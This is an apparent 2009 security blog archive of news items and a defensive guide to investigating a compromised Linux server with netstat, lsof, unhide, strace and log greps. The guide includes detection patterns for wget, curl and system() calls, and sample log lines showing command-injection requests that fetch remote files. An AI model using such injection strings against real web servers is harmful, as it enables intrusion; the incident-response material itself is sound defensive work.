Monday, September 14, 2009

NSMnow – 1.5.0

The NSMnow 1.5 series sees the initial completed feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use and test an NSM configuration for themselves but were daunted by the process of doing it from scratch.

With this being the initial release supporting Fedora, RHEL and CentOS systems, there are bound to be some teething problems. As long as you submit the bug reports, we will fix them and NSMnow will continue to get even better, if that's possible.


iPhone anti-phishing sigs only slightly delayed

A number of security experts initially criticized Apple's latest security feature for the iPhone, only to find -- 24 hours later -- that the issues were mostly moot.

On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by desktop Safari were still loaded by the iPhone's mobile browser. Yet by Friday the issue appeared to have been mostly fixed.

It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.

"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."

On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.

"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."

Sutton commended Apple for its attention to security on the iPhone.

"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."


Sunday, September 13, 2009

Hack In The Box Security Conference 2009 - Malaysia

Date: 5-8 October 2009
Venue: Crowne Plaza Mutiara Kuala Lumpur, Jalan Sultan Ismail, 50250 Kuala Lumpur

HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of our conference is to enable the dissemination, discussion and sharing of deep-knowledge network security information.

You can see details here:

Thursday, September 10, 2009

Hackers already exploiting IIS flaws

Microsoft has revealed that hackers are already exploiting newly disclosed vulnerabilities in its Internet Information Services (IIS) web server software.

Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.

The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".

"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.

Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.

Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.

"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.

"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."

How to Investigate a compromised Linux Server

This article will assist you with a preliminary investigation of a server compromise. If the server appears to have been compromised at the root level, the server is to be considered compromised until it is rebuilt. This is not to say that you have to rebuild just because an intruder gained access to an un-privileged account. You must identify how the server was compromised, so you can patch those areas.

Note: Don't get distracted by what you find; focus on gathering as much information as possible before disturbing the environment.

Identify Who is on the Server

Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.

#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept

Identify current network activity:
#netstat -nalp

View IP Connection Count
The following command will tell you how many connections are being made to the webserver on port 80, broken down by remote address.
Replacing :80 with the port of your application will allow you to see the number of connections associated with any service. If you are using IPv6, replace cut -f1 -d: with cut -f4 -d:
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
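The same per-address count as a reusable function, added here as an example and not part of the original article. It strips the remote port with awk's sub() so one function covers IPv4 and IPv6 endpoints (the cut -f1 -d: form only handles IPv4), and it skips LISTEN sockets so the wildcard foreign address is not counted. The netstat listing embedded below is a constructed sample.

```shell
# Constructed sample in the column layout of `netstat -plant`.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/httpd
tcp        0      0 192.0.2.10:80           198.51.100.7:51022      ESTABLISHED 1240/httpd
tcp        0      0 192.0.2.10:80           198.51.100.7:51023      ESTABLISHED 1241/httpd
tcp        0      0 192.0.2.10:80           198.51.100.7:51024      TIME_WAIT   -
tcp        0      0 192.0.2.10:80           203.0.113.5:40001       ESTABLISHED 1242/httpd
tcp        0      0 192.0.2.10:22           203.0.113.9:55000       ESTABLISHED 900/sshd
tcp6       0      0 2001:db8::10:80         2001:db8:1::7:6011      ESTABLISHED 1243/httpd
tcp6       0      0 2001:db8::10:80         2001:db8:1::7:6012      ESTABLISHED 1244/httpd
tcp6       0      0 2001:db8::10:80         2001:db8:2::3:7000      ESTABLISHED 1245/httpd'

# conn_count PORT [NETSTAT_OUTPUT]
# Prints "count address" lines, least-connected first, for every non-listening
# socket whose local endpoint ends in :PORT. Reads the sample unless output is
# passed in, e.g. conn_count 80 "$(netstat -plant)" on a live host.
conn_count() {
    port=$1
    data=${2:-$SAMPLE_NETSTAT}
    printf '%s\n' "$data" |
        awk -v port="$port" '
            BEGIN { re = ":" port "$" }
            /^tcp/ && $4 ~ re && $6 != "LISTEN" {
                peer = $5
                sub(/:[0-9]+$/, "", peer)   # drop the remote port, IPv4 or IPv6
                print peer
            }' |
        sort | uniq -c | sort -n |
        awk '{ print $1, $2 }'
}

# top_talker PORT: the single address holding the most connections to PORT.
top_talker() {
    conn_count "$1" | tail -n 1 | awk '{ print $2 }'
}
```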

What is the state of the current connections?
#netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n

State and process name:
#netstat -plant | awk '/^tcp/ {split($7, a, "/"); print $6, a[2]}' | sort | uniq -c | sort -n | tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
3 LISTEN httpd
3 SYN_SENT firefox
11 ESTABLISHED firefox

List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n

To view the numeric port number instead of the service name:
#lsof -nPi

What Processes are Running?
#ps -elf
#ls /proc/*/exe -la

Sometimes processes will hide themselves well enough that the commands above won't pick them up. In these instances I use unhide:
Compile Unhide:
$ wget
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
$ mv unhide* /usr/sbin

Using Unhide:
$ unhide-tcp
Unhide 20080519

Starting TCP checking

Starting UDP checking

$ unhide proc
Unhide 20080519

[*]Searching for Hidden processes through /proc scanning

Found HIDDEN PID: 740

Found HIDDEN PID: 775

Found HIDDEN PID: 1004

Found HIDDEN PID: 2996

Found HIDDEN PID: 26921
Command: ./123qwelb

Found HIDDEN PID: 27109
Command: ./123qwelb

Found HIDDEN PID: 27213
Command: ./123qwelb

Found HIDDEN PID: 27216
Command: ./123qwelb

Found HIDDEN PID: 27284
Command: top

Check Binary Files

Oftentimes malicious users will replace system binaries with modified copies that leave back doors for the attacker to use in the event that the original attack vector is corrected.

You can use the strings command to view the printable text in a binary file, which gives you a quick way to spot whether a binary has been modified (for example, unexpected paths, hostnames or help text).

Compare the output of the following command with that of a known good server:
#strings /usr/bin/top

Investigate Process Activity

Want to see what a process is doing? Run the following command, replacing $PID with the actual process id:
#strace -p $PID

In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls made by the process and the signals it receives. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.

The -p flag attaches strace to an already running process instead of starting a new one.

Suspicious Files

Are suspicious files located in the world writeable directories?

The next thing you want to look at are the directories that are world writeable. More often than not, the intruder is not a hacker at all, but a worm that is spreading through the internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search in are /tmp, /var/tmp, and /dev/shm.

#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab

Many times you will find that the worm/intruder will try to hide subdirectories in ways that make it hard to find how to enter the directory. Using the tab key for the auto-complete often helps. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...

Point(s) of Entry

Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.

Many times vulnerable web scripts (php, perl, etc) are exploited and commands are then executed on the server as the web user. We are going to want to use grep to search the apache logs for some common commands that are often used by intruders.

You will want to use different commands depending on what control panel software the server is running.

No control panel
for i in `locate access_log`; do
echo $i; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i;
done

You may have to look in the customer's VirtualHost container to ascertain the real name of the log file.

The following code will check if any system functions were called using the webserver:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command searches for XSS vulnerabilities (with the added benefit of searching for positive HTTP status codes):
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /[2-3]/ {print}'

egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /home/virtual/site*/fst/var/log/httpd/*

egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*

On servers with a large number of sites, running the previous command will give you an "argument list too long" error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2>/dev/null;
done

egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*

To locate XSS vulnerabilities try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /[2-3]/ {print}'

This command searches the URI string for the text http. URIs with a protocol identifier in them often indicate an XSS attack. However, some applications such as WordPress, among others, can produce false positives. Additionally, this command will only return results for requests with a positive reply code, indicating a successful request to the web server.

Keep in mind that not all results mean the server has been compromised, it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives so using grep to cut 404's and 400's out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands.
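The two log checks above combined into one function that also applies the status filtering the text recommends, added here as an example and not part of the original article. The status test is anchored (^[23]) so 403s and 404s are dropped rather than matched by a bare /[2-3]/, and the URL check looks for a real scheme in the URI field only, so a URL in the referer does not count. The access-log lines embedded below are constructed samples in Apache combined format.

```shell
# Constructed sample access-log lines (combined format).
SAMPLE_LOG='198.51.100.7 - - [10/Sep/2009:10:01:02 +0000] "GET /index.php?page=http://203.0.113.5/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Sep/2009:10:01:05 +0000] "GET /cgi-bin/test.cgi?cmd=wget%20http://203.0.113.5/b HTTP/1.1" 200 44 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2009:10:02:11 +0000] "GET /shop/?id=1;system(%27id%27) HTTP/1.1" 404 210 "-" "curl/7.19"
192.0.2.55 - - [10/Sep/2009:10:03:00 +0000] "GET /blog/?p=12 HTTP/1.1" 200 8120 "http://www.example.com/" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2009:10:04:40 +0000] "GET /shop/?id=1;system(%27id%27) HTTP/1.1" 302 0 "-" "curl/7.19"'

# suspicious_requests [LOG_TEXT]
# Prints "<tag> <client> <status> <uri>" per hit. Tag "cmd" marks the
# command-injection pattern from the text, "url" a URL inside the request URI.
# Reads the sample unless log text is passed in, e.g.
# suspicious_requests "$(cat /var/log/httpd/access_log)".
suspicious_requests() {
    printf '%s\n' "${1:-$SAMPLE_LOG}" |
        awk '
            # In the combined format $7 is the request URI and $9 the status.
            $9 !~ /^[23]/ { next }    # 4xx/5xx: the request did not succeed
            tolower($7) ~ /(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20/ {
                print "cmd", $1, $9, $7; next
            }
            $7 ~ "https?://" { print "url", $1, $9, $7 }
        '
}

# Number of hits; the sample yields 3 (line 3 is a 404, line 4 only has a
# URL in the referer, line 2 is tagged cmd because that test runs first).
suspicious_count() { suspicious_requests "$@" | wc -l | tr -d ' '; }
```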

Document all of your findings!

Wrap Up

Root Compromise
If you determine that an attacker has gained root access you will need to contact your sales representative, to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.

Ideally you should upload your sites to the new server from a local backup; however, we can attempt to clean up the sites as best we can if local backups are not available.

User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.


Wednesday, September 09, 2009

Vista/2008/Windows 7 SMB2 BSOD 0Day

Microsoft's SMB2 implementation can be remotely crashed using proof-of-concept code that has been published. This vulnerability affects Windows 7, Vista and Server 2008. The exploit needs no authentication, only file sharing enabled, and a single packet is enough to cause a BSOD. We recommend filtering access to TCP port 445 with a firewall.

More details,

Friday, September 04, 2009

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory.
Normal users can exploit this too if they can read a directory.

These are the steps to exploit it:

fimap-A little tool for local and remote file inclusion auditing and exploitation

fimap is a little Python tool which can find, prepare, scan, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps. fimap should be something like sqlmap, just for LFI/RFI bugs instead of SQL injection. It is currently under heavy development but it's usable.

fimap is currently under development but still usable. Feel free to test it!
This document and tool are not recommended for people who don't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.

You can download it here: